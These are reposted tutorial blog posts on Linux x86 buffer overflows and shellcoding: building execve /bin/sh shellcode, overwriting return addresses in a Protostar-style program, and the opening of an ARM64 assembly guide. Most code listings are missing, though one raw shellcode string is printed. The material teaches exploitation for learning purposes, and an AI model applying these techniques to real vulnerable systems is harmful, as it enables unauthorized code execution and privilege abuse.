The main purpose behind exploiting Buffer Overflow is to spawn a reverse shell or execute arbitrary commands at least. Even if we find a vulnerable binary with stack overflow and are able to overwrite the return address, we still have to tell the binary to execute commands on our behalf. But how do we do that? Suppose we want to spawn a shell of a vulnerable binary, but the code to spawn a shell is not present in the binary. So, even if we control the flow of the binary we really can’t modify the return address to a memory address which can execute the code which spawns a shell. We saw in the previous two blogs, we were able to overwrite the buffer with any arbitrary data. This means, when the program is loaded into memory all the operations are carried out on the stack. Any user input accepted will be stored on the stack and if the program accepts malicious input (remember insufficient bound checking) it also gets stored on the stack. So instead of placing random data, if we place the code which we want to execute on to the stack it will give us the results.
Simple Right? NO !!

We can’t simply go ahead and paste the code of spawning a shell onto the buffer, because when the program is running it is loaded into the system memory and it communicates with the processor for carrying out the operations through syscalls which is understood by kernel who actually communicates with the processor to get things done(well this is a simplified statement, the actual process is too complex). Now the processor doesn’t understand C,C++, JAVA, Python, etc. it only understands the machine code which it can directly execute. And We, human beings can’t understand machine code so we write programs in high level languages. Also, machine code is mostly regarded as the lowest level representation of compiled code. Another main reason we use machine code is because of the size. The space available in the stack for operations are very limited and machines codes are really compact in that sense.

SHELLCODE

So till now it is pretty clear that the code or payload used to exploit the buffer overflow vulnerability to execute arbitrary commands is called Shellcode. Its name is derived from the fact that it was initially used to spawn a root shell. Shellcode is basically a set of machine code or set of instructions injected into the buffer of the vulnerable program. The vulnerable program then executes the shellcode.

Shellcodes are machine codes. Basically, we write a set of instructions in a high level language or assembly language then convert into hexadecimal values (these values are just a bunch of opcodes and operands understood by the processor).

We cannot run shellcode directly, instead it needs a some sort of carrier (buffer, file, process, environment variables, etc) which will be read or executed by the vulnerable software. There are many shellcode execution strategies which are used depending on the exploitability and constraints of the vulnerable software.

Shellcodes are written mainly to force the program to do actions on the behalf of the attacker. The attacker can write a specific function which will do the intended action once loaded into the same address space of the vulnerable software. Every action (well almost) in an operating system is done by calling a syscall or system calls. The shellcode will also contain a syscall for a specific action which the attacker needs to perform. Syscalls are the most important thing in the shellcode as you can force the program to perform action just by triggering a syscall.

SYSCALLS

According to wikipedia, “In computing, a system call is the programmatic way in which a computer program requests a service from the kernel of the operating system it is executed on. ”

Linux’s security mechanism (the ring model) is divided into two spaces : User Space and Kernel space. Eevery process running in the userspace has its own virtual address space and cannot access any other processes address space until explicitly allowed. When the process in the userspace wants to access the kernel space to execute some operations, it cannot directly access it. No processes in the userspace can access the kernel space.

When an userspace process tries to access the kernel, an exception is raised and prevents the process from accessing the kernel space. The userspace processes uses the syscalls to communicate with the kernel processes to carry out the operations.

Syscalls are a bunch of functions which gives a userland process direct access to the kernel space to carryout low level functions. In simpler words, Syscalls are an interface between user mode and kernel mode.

In Linux, syscalls are generated using the software interrupt instruction, int 0x80. So, when a process in the user mode executes the int 0x80 instruction, the flow is transferred from the user mode to kernel mode by the CPU and the syscall is executed. Other than syscalls, there are standard library functions like the libc (which is extensively used in the linux OS). These standard library functions also call the syscall in some way or another (not everytime though). But we wont look into that as we are not going to use library functions in our shellcode. Also, using syscall is much nicer because there is no linking involved with any library as needed in other programming languages.

Note: The software interrupt int 0x80 was proving to be slower on the Pentium processors, so Linus introduced two new alternative namely SYSENTER/SYSEXIT instructions which were provided by all Pentium II+ processors. We will use the int 0x80 instruction in our shellcode however.

HOW TO USE SYSCALLS

When a process is in the userspace and the syscall instruction is executed, the interrupt handler i.e the software interrupt int 0x80 tells the CPU to change the execution from user mode to kernel mode. Now the system call handler is notified to call the routine which the userland process wanted. All the syscalls are stored in a syscall table, it is a big array which points to the memory address of the syscall routines. When the syscall is called, the syscall number is loaded into EAX register, this is how the system call handler comes to know which system call routine to execute. Keep in mind that the execution done here is carried out on the Kernel space stack and after the execution the control is given back to the userspace process and the remaining operation is carried out on userspace stack.

Here is the list of all the syscalls (x86):- http://syscalls.kernelgrok.com/

Each syscall is assigned a syscall number (an integer value) for basic naming convention. Every syscall has arguments which are necessary to execute the related operations. The syscall number is stored in the EAX register and the arguments are stored in the EBX , ECX , EDX , ESI and EDI respectively.

All the linux syscalls are well documented with instructions of how to implement them in your program. Usually we can use the syscall in normal C program or we can go ahead and do the same in an assembly language. Since we are writing our own shellcode, we have to dip our hands in the world of assembly language.

So what we will do is, write a C program with the syscall, disassemble the program, see the assembly instructions, write the assembly equivalent, make the necessary changes and extract the shellcode. Now we could have done this in assembly language directly but for getting the whole idea of how a program works from the high level to low level I am choosing this path.

Basic Assembly knowledge is needed for this, if you are new to Assembly then you can read the Assembly and Shellcoding blog series by my friend SLAER.

SPAWNING A SHELL

Lets write a shellcode for spawning a shell. We will use execve syscall for this operation.

First, lets take a look at the man page for execve..

The whole function looks like this:-

Here, filename is the command or program which we want to execute, in our case “/bin/sh”. Argv is an array of the argument string passed to the new program and it should contain the filename in its first index. Envp array can be NULL. Also the argvand envp array must end with a NULL.

We will initiate a char array spawnshell[2], with spawnshell[0]= “/bin/sh” and the next index being NULL i.e spawnshell[1]=NULL. We declared the last index as NULL because argv must end with a NULL byte.

So, execve will look like:

The C code for spawning a shell :

Compiling the program:

(We used static flag while compiling to prevent the dynamic linking as we want to disassemble the execve function.)

Running the executable we get a shell.

Lets disassemble the main function in our favorite GDB:

Here, the execve is called from the libc library, because we wrote a C program and used stdlib. Before calling the execve() function, the arguments required by it are stored on the stack. We will see the important instructions in detail:

sub $0x14, %esp -> Subtracting 14 from ESP, this is how the space is allocated on the stack.

1) movl $0x80bb868,-0x14(%ebp) -> Moving the memory address 0x80bb868 which contains “/bin/sh” on the stack. (You can see the value by using the command x/1s 0x80bb868 in GDB)

2) movl $0x0,-0x10(%ebp) -> Moving 0 on the stack at -0x10(%ebp), means the NULL byte after the “/bin/sh”.

3) mov -0x14(%ebp),%eax -> EAX now has the “/bin/sh”.

4) push $0x0 -> 0 is pushed onto the stack.

5) lea -0x14(%ebp),%edx -> The effective address of -0x14(%ebp) is loaded into EDX i.e EDX is pointing to the pointer of “/bin/sh”.

6) push %edx -> Pushing the value of EDX on the stack.

7) push %eax -> Pushing the value of EAX on the stack.

8)call 0x806c990 <execve> -> calling the function execve.

So what does this mean? Every numbered points are explained below in the same manner:-

1) filename = “/bin/sh”

2) filename = “/bin/sh” followed by NULL

3) argv[0]= “/bin/sh”

4) 0 is pushed for the envp

5) pointing to the pointer of “/bin/sh” i.e argv

6) EDX=argv

7) EAX= filename

8) execve function is called

Now the execve function according to the arguments pushed onto the stack will look like:-

execve(EAX, EDX,0)

So, now we know what to do with the assembly instructions. Lets write an assembly program for execve syscall.

Lets look at the execve syscall w.r.t assembly instructions:

Assembly program:-

Assemble this program:

Link this program:

Running the program we can see we get a shell.

Now, we want to extract the opcodes from the executable to form our shellcode. We will use objdump utility to display the object file.

Here, we can see in the right side, the assembly instructions that we wrote and in the left side opcodes for those instructions. Now we just have to copy these opcodes and execute it from C program which will act as a carrier for our shellcode.

Our Shellcode now is:

“\xc7\x05\xa8\x90\x04\x08\xa0\x90\x04\x08\xb8\x0b\x00\x00\x00\xbb\xa0\x90\x04\x08\xb9\xa8\x90\x04\x08\xba\xac\x90\x04\x08\xcd\x80\xb8\x01\x00\x00\x00\xbb\x0a\x00\x00\x00\xcd\x80”

As we already know we cannot execute shellcode directly, we will be needing a program to execute it for us. Shellcode is always loaded into the virtual address space of the target process which we want to exploit. Shellcode cant have its own process space as it cant be executed directly and it doesn’t makes sense to load the shellcode in any other address space other than the vulnerable software.

Just for demonstration we will load the shellcode in the address space of our own program and see whether it gets executed or not.

We will write a small C program which will execute our shellcode:

So, whats the program doing?

First, we are defining a char array shellcode with our actual shellcode in it. Then, in the main() function we are defining a variable ret which is an int pointer.

Then we are making the ret variable point to an address which is 8 bytes (2 int value)from its own address.

Remember this will happen on the stack, and the addresses on the stack moves from higher order memory to the lower order memory. So, by adding 8 bytes to the address of ret variable we are actually making it points towards the main()function.

Then we are assigning the address of our shellcode array to the address of the retvariable which is pointing to the address of main. So before the program ends it will execute our shellcode.

Lets compile the program:

Running the program we get Segmentation fault (core dumped)

So, we can see that our shellcode didn’t work. Lets take a look at what is wrong with our shellcode.

We can see there are a bunch of NULL bytes in the opcodes i.e ‘00’. Now one important thing, mostly the shellcode is loaded into the user input buffer and mostly it will be a char buffer or string buffer. If a NULL value occurs in the string, it terminates the string right there and doesn’t accept anything after the NULL termination. So our shellcode containing NULL values wont work. So we have to find a way to eliminate the NULL values.

Also, we are using hardcoded addresses in our shellcode. As we can see the mov instructions, all those addresses are machine specific hardcoded addresses. It is highly likely that it might not work in different versions of linux. So we have to deal with that also. One thing we can do is somehow load the starting address of our shellcode in the memory and using that reference we can make the necessary operations relative to this address. Now this is called as relative addressing. We will see this later in more detail.

Now the important part is to modify the assembly code with the two requirements mentioned above, getting rid of the NULL values and implementing relative addressing for avoiding hardcoded addresses .

REFINING THE SHELLCODE

So lets start…

From the above assembly program we know what instructions are needed to create our shellcode. In the above program we defined an ASCII string with “/bin/sh” and assigned the address of the string to another variable which will act as the pointer. But in the shellcode we will get the memory address of that variable and it will not work around different linux machines as the address may differ.

So in the manpages of the execve syscall it is clearly stated that, “The argv and envp arrays must each include a null pointer at the end of the array.” In our case envparray is already NULL, but the filename i.e the first index of argv pointer should also end with a NULL value. In the above assembly program we were defining separate variables for each argument of the syscall, but now we cant do that.

The execve syscall has three char pointer arguments. For the first argument we will have “/bin/shA”. We are appending A because we directly cant add a NULL value as it will hamper our shellcode, instead we will assign the index of A, a null value from the register. For the next char argument we will append four B’s as char is 4 bytes. Now the second argument is a pointer to the start of the address of the filename. Here we will assign the index of the starting B with the address of the starting memory address of filename. The third argument is the envp array which is a NULL pointer and we will append it with four C’s and then we will assign the index of the first C with a null value.

The representation of execve syscall arguments w.r.t registers will be like:

int execve(EBX, ECX, EDX); and the execve syscall number 11 will be loaded in the EAX register.

Below is the representation of the string which we will load along with the index in hex.

Lets take a look into the final assembly program for our shellcode.

Refined assembly program for Shellcode:

Now I will explain in detail what we have done.

-> We are starting our shellcode with a jmp instruction. jmp instruction will make an unconditional jump to the specified memory location. It will skip the actual shellcode and directly jump to the ShellcodeCall memory address.

-> In there the call instruction is executed which will directly point our Shellcode. Now what happens here is the most important thing. When the call instruction is executed the next instruction or memory address which contains the string “/bin/shABBBBCCCC” is pushed onto the top of the stack as the ret address. This is how we implement relative addressing.

->Now the pop instruction is executed. So the pop instruction will load the retaddress which has the string in the ESI register. The ESI register has the memory location which points to “/bin/shABBBBCCCC”. ESI register will be the reference point for all the operation which we will perform so the issue of hardcoded addresses will be resolved.

->Next we are XORing the EAX register to avoid the NULL bytes. We are basically resetting the EAX register without assigning a NULL value.

->Then we are loading the value 0 from the AL register (As we all know the ALregister is the lower part of the EAX address which is already 0 after the XORing) to the 7th index of the ESI register which will replace the A in our string with a null value.

-> Then we are loading the value of ESI i.e the start address of our string into the 8th index of ESI register replacing the B’s in our string.

->Then we are loading 0 from the AL register into the 12th index of our ESI register i.e replacing the C’s with 0’s.

-> Then we are loading the arguments of execve into the EBXECX and EDXregisters.

->Then we are loading the execve syscall number 11 into AL register again avoiding the NULL bytes because the higher part of the EAX register holds 0.

-> Lastly we make a software interrupt which will execute the syscall.

Now lets take a look at the opcodes after assembling and linking the assembly program.

As we can see there are no null bytes and the hardcoded addresses are also solved.

Now lets copy our shellcode into the C program which we wrote earlier to check whether our shellcode executes or not.

Lets run the compiled C program binary and see if it works.

VOILA !!!

We successfully spawned a shell with our own shellcode.

This was a very basic example of writing a working shellcode. Now there are many situations where you want take a reverse shell over the network and you have to write a shellcode for that. That would be a really challenging task to write a shellcode of that manner. This blog post only introduced what a shellcode looks like and how much pain you have to take to write a simple working shellcode.

In the next part, we will exploit a vulnerable binary and execute shellcode on that.

If you have any doubts or opinions, kindly express yourselves in the comment section. Thanks !!!

Linux Buffer Overflows x86 Part 2 ( Overwriting and manipulating the RETURN address)

( Original text by SubZero0x9 )

Hello Friends, this is the 2nd part of the Linux x86 Buffer Overflows. First of all I want to apologize for such a long delay after the First blog of this series, there were personal and professional issues going on in my life (Well who hasn’t got them? Meh?).

In the previous part we learned about the Process Memory, Stack Region, Stack Operations, Stack Registers, Attempting Buffer Overflow, Overwriting Buffer, ESP and EIP. In case you missed it, here is the link to the Part 1:

https://movaxbx.ru/2018/11/06/getting-started-with-linux-buffer-overflows-x86-part-1-introduction/

Quick Recap to the Part 1:

-> We successfully exploited the insufficient bound checking by giving input which was larger than the buffer size, which led to the overflow.

-> We successfully attempted to overwrite the buffer and the EIP (Instruction Pointer).

-> We used GDB debugger to examine the buffer for our input and where it was placed on the stack.

Till now, we already know how to attempt a buffer overflow on a vulnerable binary. We already have the control of EIP and ESP.

So, Whats Next ?

Till now we have only overwritten the buffer. We haven’t really exploit anything yet. You may have read articles or PoC where Buffer Overflow is used to escalate privileges or it is used to get a reverse shell over the network from a vulnerable HTTP Server. Buffer Overflow is mainly used to execute arbitrary commands on the vulnerable system.

So, we will try to execute arbitrary commands by using this exploit technique.

In this blog, we will mainly focus on how to overwrite the return address to manipulate the flow of control and program execution.

Lets see this in more detail….

We will use a simple program to manipulate its intended output by changing the RETURN address.

(The following example is same as the AlephOne’s famous article on Stack Smashing with some modifications for a better and easy understanding)

Program:

 

This is a very simple program where the variable random is assigned a value ‘0’, then a function named function is called, the flow is transferred to the function()and it returns to the main() after executing its instructions. Then the variable random is assigned a value ‘1’ and then the current value of random is printed on the screen.

Simple program, we already know its output i.e 1.

But, what if we want to skip the instruction random=1; ?

That means, when the function() call returns to the main(), it will not perform the assignment of value ‘1’ to random and directly print the value of random as ‘0’.

So how can we achieve this?

Lets fire up GDB and see how the stack looks like for this program.

(I won’t be explaining each and every instruction, I have already done this in the previous blog. I will only go through the instructions which are important to us. For better understanding of how the stack is setup, refer to the previous blog.)

In GDB, first we disassemble the main function and look where the flow of the program is returned to main() after the function() call is over and also the address where the assignment of value ‘1’ to random takes place.

-> At the address 0x08048430, we can see the value ‘0’ is assigned to random.

-> Then at the address 0x08048437 the function() is called and the flow is redirected to the actual place where the function() resides in memory at 0x804840b address.

-> After the execution of function() is complete, it returns the flow to the main()and the next instruction which gets executed is the assignment of value ‘1’ to random which is at address 0x0804843c.

->If we want to skip past the instruction random=1; then we have to redirect the flow of program from 0x08048437 to 0x08048443. i.e after the completion of function() the EIP should point to 0x08048443 instead of 0x0804843c.

To achieve this, we will make some slight modifications to the function(), so that the return address should point to the instruction which directly prints the randomvariable as ‘0’.

Lets take a look at the execution of the function() and see where the EIP points.

-> As of now there is only a char array of 5 bytes inside the function(). So, nothing important is going on in this function call.

-> We set a breakpoint at function() and step through each instruction to see what the EIP points after the function() is exectued completely.

-> Through the command info regsiters eip we can see the EIP is pointing to the address 0x0804843c which is nothing but the instruction random=1;

Lets make this happen!!!

From the previous blog, we came to know about the stack layout. We can see how the top of the stack is aligned, 8 bytes for the buffer, 4 bytes for the EBP, 4 bytes for the RET address and so on (If there is a value passed as parameter in a function then it gets pushed first onto the stack when the function is called).

-> When the function() is called, first the RET address gets pushed onto the stack so the program flow can be maintained after the execution of function().

->Then the EBP gets pushed onto the stack, so the EBP can act as the offset reference point for other instructions to access and calculate the memory addresses.

-> We have char array buffer of 5 bytes, but the memory is allocated in terms of WORD. Basically 1 word=4 bytes. Even if you declare a variable or array of 2 bytes it will be allocated as 4 bytes or 1 word. So, here 5 bytes=2 words i.e 8 bytes.

-> So, in our case when inside the function(), the stack will probably be setup as buffer + EBP + RET

-> Now we know that after 12 bytes, the flow of the program will return to main()and the instruction random = 1; will be executed. We want to skip past this instruction by manipulating the RET address to somehow point to the address after 0x0804843c.

->We will now try to manipulate the RET address by doing something like below :-

 

Here, we are introducing an int pointer ret, and we are assigning it the starting address of buffer + 12 .i.e (wait lets see this in a diagram)

-> So, the ret pointer now ends exactly at the start where the return value is actually stored. Now, we just want to add ret pointer with some value which will change the return value in such a manner that it will skip past the return = 1;instruction.

Lets just go back to the disassembled main function and calculate how much we have to add to the ret pointer to actually skip past the assignment instruction.

-> So, we already know we want to skip pass the instruction at address 0x0804843c to address 0x08048443. By subtracting these two address we get 7. So we will add 7 to the return address so that it will point to the instruction at address 0x08048443.

-> And now we will add 7 to the ret pointer.

 

So our final code should look like:

 

So, now we will compile our code.

 

Since we are adding code and re-compiling the program, the memory addresses will get changed.

Lets take a look at the new memory addresses.

-> Now the assignment instruction random = 1; is at address 0x08048452 and the next address which we want the return address to point is 0x08048459. The difference between these addresses is still 7. So we are good till now.

Hopefully by executing this we will get the output as “The value of random is: 0”

HOLY HELL!!!

Why did it gave the Segmentation fault (core dumped)? That means maybe the process is trying to access a memory that doesn’t exist or something.

Note:- Well this was really tricky for me atleast. Computers works in mysterious ways, it is not just mathematics, numbers and science ( Yeah I am being dramatic)

Lets fire up our binary in GDB and see whats wrong.

-> As you can see we set a breakpoint at line 4 and run the program. The breakpoint hits and the program halts. Then we examine the stack top and what we see, the distance between the start of the buffer and the start of return address is not 12, its 13. (It doesn’t even make sense mathematically). Three full block adds up for 12 bytes (4 bytes each) and 1 byte for that ‘A’ i.e 41.

-> Our buffer had value “ABCDE” in it. And A in ASCII hex is 41. From 41 to just right before of the return address 0x08048452, the count is 13 which traditionally is not correct. I still don’t know why the difference is 13 instead of 12, if anyone knows kindly tell me in the comments section.

-> So we just change our code from ret = buffer + 12; to ret = buffer + 13;

Now the final code will look like this:

 

Now, we re-compile it and run and hope its now going to give a desired output.

Before continuing lets see this again in GDB:

> So, we can see now after 7 is added to the ret pointer, the return address is now 0x08048459 which means we have successfully skipped past the assignment instruction and overwritten the return address to manipulate our way around the program flow to alter the program execution.

Till now we learnt a very important part of buffer overflow i.e how to manipulate and overwrite the return address to alter the program execution flow.

Now, lets another example where we can overwrite the return address in more similar ‘buffer overflow’ fashion.

We will use the program from protostar buffer overflow series. You can find more about it here: https://exploit-exercises.com/protostar/

 

Small overview of a program:-

->There is a function win() which has some message saying “code flow successfully changed”. So we assume this is the goal.
-> Then there is the main(), int pointer fp is declared and defined to ‘0’ along with char array buffer with size 64. The program asks for user input using the getsfunction and the input is stored in the array buffer.
-> Then there is an if statement where if fp is not equal to zero then it calls the function pointer jumping to some memory location.

Now we already know that gets function is vulnerable to buffer overflow (visit previous blog) and we have to execute the win() function. So by not wasting time lets find out the where the overflow happens.

First we will compile the code:

 

We know that the char array buffer is of 64 bytes. So lets feed input accordingly.

So, as we can see after the 64th byte the overflow occurs and the 65th ‘A’ i.e 41 in ASCII Hex is overwriting the EIP.

Lets confirm this in GDB:

-> As we see the buffer gets overflowed and the EIP is overwritten with ‘A’ i.e 41.

Now lets find the address of the win() function. We can find this with GDB or by objdump.

Objdump is a tool which is used to display information about object files. It comes with almost every Linux distribution.

The -d switch stands for disassemble. When we use this, every function used in a binary is listed, but we just wanted the address of win() function so we just used grep to find our required string in the output.

So it tells us that the win() function’s starting address is 0804846b. To achieve our goal we just have to pass this address after the 64th byte so that the EIP will get overwritten by this address and execute the win() function for us.

But since our machine is little endian (Find more about it here)we have to pass the address in a slightly different manner (basically in reverse). So the address 0804846b will become \x6b\x84\x04\x08 where the \x stands for HEX value.

Now lets just form our input:

As we can see the win() function is successfully executed. The EIP is also pointing the address of win().

Hence, we have successfully overwritten the return address and exploited the buffer overflow vulnerability.

Thats all for this blog. I am sorry but this blog also went quite long, but I will try to keep the next blog much shorter. And also, in the next blog we will try to play with shellcode.

 

 

A Guide to ARM64 / AArch64 Assembly on Linux with Shellcodes and Cryptography

( Original text by odzhan )

Introduction

The Cortex-A76 codenamed “Enyo” will be the first of three CPU cores from ARM designed to target the laptop market between 2018-2020. ARM already has a monopoly on handheld devices, and are now projected to take a share of the laptop and server market. First, Apple announced in April 2018 its intention to replace Intel with ARM for their Macbook CPU from 2020 onwards. Second, a company called Ampere started shipping a 64-bit ARM CPU for servers in September 2018 that’s intended to compete with Intel’s XEON CPU. Moreover, the Automotive Enhanced (AE) version of the A76 unveiled in the same month will target applications like self-driving cars. The A76 will continue to support A32 and T32 instruction sets, but only for unprivileged code. Privileged code (kernel, drivers, hyper-visor) will only run in 64-bit mode. It’s clear that ARM intends to phase out support for 32-bit code with its A series. Developers of Linux distros have also decided to drop support for all 32-bit architectures, including ARM.

This post is an introduction to ARM64 assembly and will not cover any advanced topics. It will be updated periodically as I learn more, and if you have suggestions on how to improve the content, or you believe something needs correcting, feel free to email me.

If you just want the code shown in this post, look here.

Please refer to the ARM Architecture Reference Manual ARMv8, for ARMv8-A architecture profile for more comprehensive information about the ARMv8-A architecture. Everything I discuss with exception to the source code and GNU topics can be found in the manual.

Table of contents

  1. ARM Architecture
    1. Profiles
    2. Operating Systems
    3. Registers
    4. Calling Convention
    5. Condition Codes
    6. Data Types
    7. Data Alignment
  2. A64 instruction set
    1. Arithmetic
    2. Logical and Move
    3. Load, Store and Addressing Modes
    4. Conditional
    5. Bit Manipulation
    6. Branch
    7. System
    8. x86 and A64 comparison
  3. GNU Assembler
    1. GCC assembly
    2. Comments
    3. Preprocessor Directives
    4. Symbolic Constants
    5. Structures and Unions
    6. Operators
    7. Macros
    8. Conditional assembly
  4. GNU Debugger
    1. Layout
    2. Commands
  5. Common operations
    1. Saving registers.
    2. Copying registers.
    3. Initialize register to zero.
    4. Initialize register to one.
    5. Initialize register to -1.
    6. Test register for FALSE or 0.
    7. Test register for TRUE or 1.
    8. Test register for -1.
  6. Linux Shellcode
    1. System Calls
    2. Tracing
    3. Execute /bin/sh
    4. Execute /bin/sh -c
    5. Reverse connect /bin/sh
    6. Bind /bin/sh to port
    7. Synchronized shell
  7. Encryption
    1. AES-128
    2. KECCAK
    3. GIMLI
    4. XOODOO
    5. ASCON
    6. SPECK
    7. SIMECK
    8. CHASKEY
    9. XTEA
    10. NOEKEON
    11. CHAM
    12. LEA
    13. CHACHA
    14. PRESENT
    15. LIGHTMAC
  8. Summary

1. ARM Architecture

ARM is a family of Reduced Instruction Set Computer (RISC) architectures for computer processors that has become the predominant CPU for smartphones, tablets, and most of the IoT devices being sold today. It is not just consumer electronics that use ARM. The CPU can be found in medical devices, cars, aeroplanes, robots..it can be found in billions of devices. The popularity of ARM is due in part to the reduced cost of production and power-efficiency. ARM Holdings Inc. is a fabless semiconductor company, which means they do not manufacture hardware. The company designs processor cores and license their technology as Intellectual Property (IP) to other semiconductor companies like ATMEL, NXP, and Samsung.

In this tutorial, I’ll be programming on “orca”, a Raspberry Pi (RPI) 3 running 64-bit Debian Linux. This RPI comes with a Cortex-A53, that can support privileged code in both 32 and 64-bit mode. The Cortex-A53 CPU is an ARMv8-A 64-bit core that has backward compatibility with ARMv7-A so that it can run the A32 and T32 instruction sets. Here’s a screenshot of output from lscpu.

There are currently two execution states you should be aware of.

AArch32
32-bit, with support for the T32 (Thumb) and A32 (ARM) instruction sets.
AArch64
64-bit, with support for the A64 instruction set.

This post only focuses on the A64 instruction set.

1.1 Profiles

There are three available, each one designed for a specific purpose. If you want to write shellcode, it’s safe to assume you’ll work primarily with the A series because it’s the only profile that supports a General Purpose Operating System (GPOS) such as Linux or Windows. A Real-Time Operating System (RTOS) is more likely to be found running on the R and M series.

Core Profile Application
A Application Supports a Virtual Memory System Architecture (VMSA) based on a Memory Management Unit (MMU).
Found in high performance devices that run an operating system such as Windows, Linux, Android or iOS.
R Real-time Found in medical devices, PLC, ECU, avionics, robotics. Where low latency and a high level of safety is required. For example, an electronic braking system in an automobile. Autonomous drones and Hunter Killers (HK).
M Microcontroller Supports a Protected Memory System Architecture (PMSA) based on a MMU. Found in ASICs, ASSPs, FPGAs, and SoCs for power management, I/O, touch screen, smart battery, and sensor controllers. Some drones use the M series. HK Aerial.

The vast majority of single-board computers run on the Cortex-A series because it has an MMU for translating virtual memory addresses to physical memory addresses required by most operating systems.

1.2 Operating Systems

An RTOS is time-critical whereas a GPOS isn’t. While I do not discuss writing code for an RTOS here, it’s important to know the difference because you’re not going to find Linux running on every ARM based device. Linux requires far too many resources to be suitable for a device with only 256KB of RAM. Certainly, Linux has a lot of support for peripheral devices, file-systems, dynamic loading of code, network connectivity, and user-interface support; all of this makes it ideal for internet connected handheld devices. However, you’re unlikely to find the same support in an RTOS because it is not a full OS in the sense that Linux is. An RTOS might only consist of a static library with support for task scheduling, Interprocess Communication (IPC), and synchronization.

Some RTOS such as QNX or VxWorks can be configured to support features normally found in a GPOS and it’s possible you will come across at least one of these in any vulnerability research. The following is a list of embedded operating systems you may wish to consider researching more about.

Open source

Proprietary

1.3 Registers

This post will only focus on using the general-purpose, zero and stack pointer registers, but not SIMD, floating point and vector registers. Most system calls only use general-purpose registers.

Name Size Description
Wn 32-bits General purpose registers 0-31
Xn 64-bits General purpose registers 0-31
WZR 32-bits Zero register
XZR 64-bits Zero register
SP 64-bits Stack pointer

W denotes 32-bit registers while X denotes 64-bit registers.

1.4 Calling convention

The following is applicable to Debian Linux. You may freely use x0-x18, but remember that if calling subroutines, they may use them as well.

Registers Description
X0 – X7 arguments and return value
X8 – X18 temporary registers
X19 – X28 callee-saved registers
X29 frame pointer
X30 link register
SP stack pointer

x0 – x7 are used to pass parameters and return values. The value of these registers may be freely modified by the called function (the callee) so the caller cannot assume anything about their content, even if they are not used in the parameter passing or for the returned value. This means that these registers are in practice caller-saved.

x8 – x18 are temporary registers for every function. No assumption can be made on their values upon returning from a function. In practice these registers are also caller-saved.

x19 – x28 are registers, that, if used by a function, must have their values preserved and later restored upon returning to the caller. These registers are known as callee-saved.

x29 can be used as a frame pointer and x30 is the link register. The callee should save x30if it intends to call a subroutine.

1.5 Condition Flags

ARM has a “process state” with condition flags that affect the behaviour of some instructions. Branch instructions can be used to change the flow of execution. Some of the data processing instructions allow setting the condition flags with the S suffix. e.g ANDS or ADDS. The flags are the Zero Flag (Z), the Carry Flag (C), the Negative Flag (N) and the is Overflow Flag (V).

Flag Description
N Bit 31. Set if the result of an operation is negative. Cleared if the result is positive or zero.
Z Bit 30. Set if the result of an operation is zero/equal. Cleared if non-zero/not equal.
C Bit 29. Set if an instruction results in a carry or overflow. Cleared if no carry.
V Bit 28. Set if an instruction results in an overflow. Cleared if no overflow.

1.6 Condition Codes

The A32 instruction set supports conditional execution for most of its operations. To improve performance, ARM removed support with A64. These conditional codes are now only effective with branch, select and compare instructions. This appears to be a disadvantage, but there are sufficient alternatives in the A64 set that are a distinct improvement.

Mnemonic Description Condition flags
EQ Equal Z set
NE Not Equal Z clear
CS or HS Carry Set C set
CC or LO Carry Clear C clear
MI Minus N set
PL Plus, positive or zero N clear
VS Overflow V set
VC No overflow V clear
HI Unsigned Higher than or equal C set and Z clear
LS Unsigned Less than or equal C clear or Z set
GE Signed Greater than or Equal N and V the same
LT Signed Less than N and V differ
GT Signed Greater than Z clear, N and V the same
LE Signed Less than or Equal Z set, N and V differ
AL Always. Normally omitted. Any

1.7 Data Types

A “word” on x86 is 16-bits and a “doubleword” is 32-bits. A “word” for ARM is 32-bits and a “doubleword” is 64-bits.

Type Size
Byte 8 bits
Half-word 16 bits
Word 32 bits
Doubleword 64 bits
Quadword 128 bits

1.8 Data Alignment

The alignment of sp must be two times the size of a pointer. For AArch32 that’s 8 bytes, and for AArch64 it’s 16 bytes.

2. A64 Instruction Set

Like all previous ARM architectures, ARMv8-A is a load/store architecture. Data processing instructions do not operate directly on data in memory as we find with the x86 architecture. The data is first loaded into registers, modified, and then stored back in memory or simply discarded once it’s no longer required. Most data processing instructions use one destination register and two source operands. The general format can be considered as the instruction, followed by the operands, as follows:

Instruction Rd, Rn, Operand2

Rd is the destination register. Rn is the register that is operated on. The use of R indicates that the registers can be either X or W registers. Operand2 might be a register, a modified register, or an immediate value.

2.1 Arithmetic

The following instructions can be used for arithmetic, stack allocation and addressing of memory, control flow, and initialization of registers or variables.

Menmonic Operands Instruction
ADD{S} (immediate) Rd, Rn, #imm{, shift} Add (immediate) adds a register value and an optionally-shifted immediate value, and writes the result to the destination register.
ADD{S} (extended register) Rd, Rn, Wm{, extend {#amount}} Add (extended register) adds a register value and a sign or zero-extended register value, followed by an optional left shift amount, and writes the result to the destination register. The argument that is extended from the Rm register can be a byte, halfword, word, or doubleword.
ADD{S} (shifted register) Rd, Rn, Rm{, shift #amount} Add (shifted register) adds a register value and an optionally-shifted register value, and writes the result to the destination register.
ADR Xd, rel Form PC-relative address adds an immediate value to the PC value to form a PC-relative address, and writes the result to the destination register.
ADRP Xd, rel Form PC-relative address to 4KB page adds an immediate value that is shifted left by 12 bits, to the PC value to form a PC-relative address, with the bottom 12 bits masked out, and writes the result to the destination register.
CMN (extended register) Rn, Rm{, extend {#amount}} Compare Negative (extended register) adds a register value and a sign or zero-extended register value, followed by an optional left shift amount. The argument that is extended from the Rm register can be a byte, halfword, word, or doubleword. It updates the condition flags based on the result, and discards the result.
CMN (immediate) Rn, #imm{, shift} Compare Negative (immediate) adds a register value and an optionally-shifted immediate value. It updates the condition flags based on the result, and discards the result.
CMN (shifted register) Rn, Rm{, shift #amount} Compare Negative (extended register) adds a register value and a sign or zero-extended register value, followed by an optional left shift amount. The argument that is extended from the Rm register can be a byte, halfword, word, or doubleword. It updates the condition flags based on the result, and discards the result.
CMP (extended register) Rn, Rm{, extend {#amount}} Compare (extended register) subtracts a sign or zero-extended register value, followed by an optional left shift amount, from a register value. The argument that is extended from the Rm register can be a byte, halfword, word, or doubleword. It updates the condition flags based on the result, and discards the result.
CMP (immediate) Rn, #imm{, shift} Compare (immediate) subtracts an optionally-shifted immediate value from a register value. It updates the condition flags based on the result, and discards the result.
CMP (shifted register) Rn, Rm{, shift #amount} Compare (shifted register) subtracts an optionally-shifted register value from a register value. It updates the condition flags based on the result, and discards the result.
MADD Rd, Rn, Rm, ra Multiply-Add multiplies two register values, adds a third register value, and writes the result to the destination register.
